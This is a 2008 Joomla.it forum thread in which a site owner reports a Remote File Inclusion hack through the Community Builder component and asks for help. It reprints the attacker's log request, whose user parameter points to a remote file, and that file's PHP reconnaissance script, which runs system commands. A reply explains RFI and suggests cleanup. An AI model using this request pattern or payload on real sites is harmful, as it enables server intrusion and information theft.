Joomla.it Forum

Non solo Joomla... => Sicurezza => : hs78 30 Sep 2008, 15:01:33

: Hack on Comprofiler (CB 1.1)
: hs78 30 Sep 2008, 15:01:33

Hi, my site (joomla 1.0.15 stable) has been hacked with the following command

200.93.147.155 - - [25/Sep/2008:04:56:49 +0200] "GET /mysitename//index.php?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt??? HTTP/1.1" 200 37503 "-" "libwww-perl/5.805"

where urlcrack.txt contain the following text

<?php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }
   
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
                           
}

echo "narasaon
";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;


echo "narasaon was here ..
";
echo "uname -a: $un
";
echo "os: $os
";
echo "uptime: $up
";
echo "id: $id1
";
echo "pwd: $pwd1
";
echo "php: $php1
";
echo "software: $sof1
";
echo "server-name: $name1
";
echo "server-ip: $ip1
";
echo "free: $free
";
echo "used: $used
";
echo "total: $all
";
exit;

Thanks to this code, hackers are able to send thousand of emails with our server.

Thanks in advance for any suggestion

: Re: Hack on Comprofiler (CB 1.1)
: Locu 03 Oct 2008, 11:25:54

hi,
i think your site is bugged. This type of bugs are called RFI (Remote File Inclusion).
 

/mysitename//index.php?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt

As you can see above the attacker has injected some malicious code into your site through the component "com_comprofiler". I suggest you to purge that component and perform a full check on server files and databases.

Anyway that script doesn't send email. It was used to retrive some info and psw from your server then the hacker has sent the emails using your data.


ps
look at this one:

http://www.milw0rm.com/exploits/5491

bye